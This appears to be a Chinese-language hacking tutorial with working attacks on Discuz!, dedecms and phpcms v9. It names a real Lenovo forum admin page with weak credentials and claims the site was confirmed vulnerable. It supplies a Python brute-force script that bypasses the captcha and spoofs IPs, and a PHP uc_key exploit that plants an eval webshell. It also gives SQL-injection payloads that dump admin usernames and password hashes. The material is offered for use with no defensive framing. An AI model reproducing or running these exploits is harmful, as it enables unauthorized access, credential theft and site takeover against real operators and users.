例1, discuz!后台弱口令/暴力破解
1、http://club.lenovo.com.cn/admin.php
弱口令:admin/admin
2、http://club.lenovo.com.cn/uc_server/admin.php?m=user&a=login&iframe=&sid=
uc_server 登录页面,验证码绕过
暴力破解poc如下:
uc_server.py 源代码
#coding:utf-8
import httplib,re,random,urllib,time
from sys import argv
#进行爆破
def getHtml(host,htmlhash,htmlpass,htmlseccode):
ip=str(random.randint(1,100))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))
postHead={"Host":host,"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0","X-Forwarded-For":ip,'Content-Type':'application/x-www-form-urlencoded','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Connection':'keep-alive'}
postContent='sid=&formhash='+htmlhash+'&seccodehidden='+htmlseccode+'&iframe=0&isfounder=1&password='+htmlpass+'&seccode=cccc&submit=%E7%99%BB+%E5%BD%95'
resultHtml=httplib.HTTPConnection(host, 80, False)
resultHtml.request('POST','/uc_server/admin.php?m=user&a=login',body=postContent,headers = postHead )
page=resultHtml.getresponse()
pageConect=page.read()
return pageConect
#获取 formhash 和 seccodehidden
def gethashs(host):
url='http://'+host+'/uc_server/admin.php'
pageContent=urllib.urlopen(url).read()
r1=re.compile('<input type="hidden" name="formhash" value="(\S+)" />')
htmlhash=r1.findall(pageContent)[0]
r2=re.compile('<input type="hidden" name="seccodehidden" value="(\S+)" />')
htmlseccode=r2.findall(pageContent)[0]
return htmlhash+' '+htmlseccode
#通过argv获取 host 字典 间隔时间 进行爆破
if(len(argv)==1):
print '---->python '+argv[0]+' host地址 字典文件 间隔时间'
print '---->python '+argv[0]+' 192.168.1.105 pass.txt 0.2'
else:
host=argv[1]
passfile=argv[2]
sleeptime=argv[3]
print '网站host为 '+host
#取域名 然后添加一些密码
hostuser=host.split('.')
hostuser=hostuser[len(hostuser)-2]
hostpass=[hostuser+'123',hostuser+'888',hostuser+hostuser,hostuser+'..',hostuser+'.',hostuser+'admin888',hostuser+'admin123',hostuser+'admin',hostuser+'123456']
print '密码字典为 '+passfile
print '间隔时间为 '+sleeptime
print '--->'
x=gethashs(host).split(' ')
f=open(passfile,'r')
htmlpass=f.read().split('\r\n')
htmlpass=hostpass+htmlpass
f.close()
for i in range(len(htmlpass)):
time.sleep(float(sleeptime))
print '正在尝试密码'+htmlpass[i]
if(getHtml(host,x[0],htmlpass[i],x[1])==''):
print '密码为 '+htmlpass[i]
break
poc使用说明:在程序中修改IP、字典文件、时间间隔,即可暴力破解
---->python D:\WWW\uc_server.py host地址 字典文件 间隔时间
---->python D:\WWW\uc_server.py 192.168.1.105 pass.txt 0.2
经测试,联想club站存在该漏洞,验证码绕过,可暴力破解uc_server创始人密码,然后,获取到uc_key,最后,获取到shell。
获取shell的exp如下:
uc_key.php 源代码
<?php
$key = 'cebbvi5s15BSiMXteaP9TNCIz5K5jAVekw7tcV9TqmYCNT5VOJdu7toOxipTX';#少年 uc_key 写在这里
$url = 'http://localhost/api/uc.php';
$arg = 'action=updateapps&time='.time();#拿webshell:http://localhost/config/config_ucenter.php 密码:c
echo 'curl "'.$url.'?code='.rawurlencode(authcode($arg,'ENCODE',$key)).'" -d "'.addslashes('<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">https://sb\');eval(\$_REQUEST[c]);#</item></root>').'"';
#curl或者用其他工具post提交
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>
例2, dedecms全版本通杀SQL注入漏洞
正常提交:plus/search.php?keyword=as&typeArr[ uNion ]=a
构造exp如下:
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
exp都非常简单,熟练SQL语句就能看懂,大家可以在本地测试。
例3, phpcms v9 SQL注入漏洞
正常流程:
1、首先要注册个帐号
2、来到会员中心--->账号管理--->修改个人信息
3、生日那里随便选个日期
4、提交--->抓包拦截
5、将birthday替换为我们的EXP,进行提交,就能爆出账号密码
构造exp如下:
%60userid%60%3D%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+%28select++%28select+concat%280x23%2Ccast%28concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%29+as+char%29%2C0x23%29+from+v9%5Fadmin+LIMIT++0%2C1%29%29+from+information%5Fschema%2Etables+limit+0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information%5Fschema%2Etables+group++by+x%29a%29+%2D%2D+
其他cms,如: phpwind、ecms 、ecshop、wordpress 、joomla、drupal SQL注入、xss、命令执行等等,大家可以自行研究。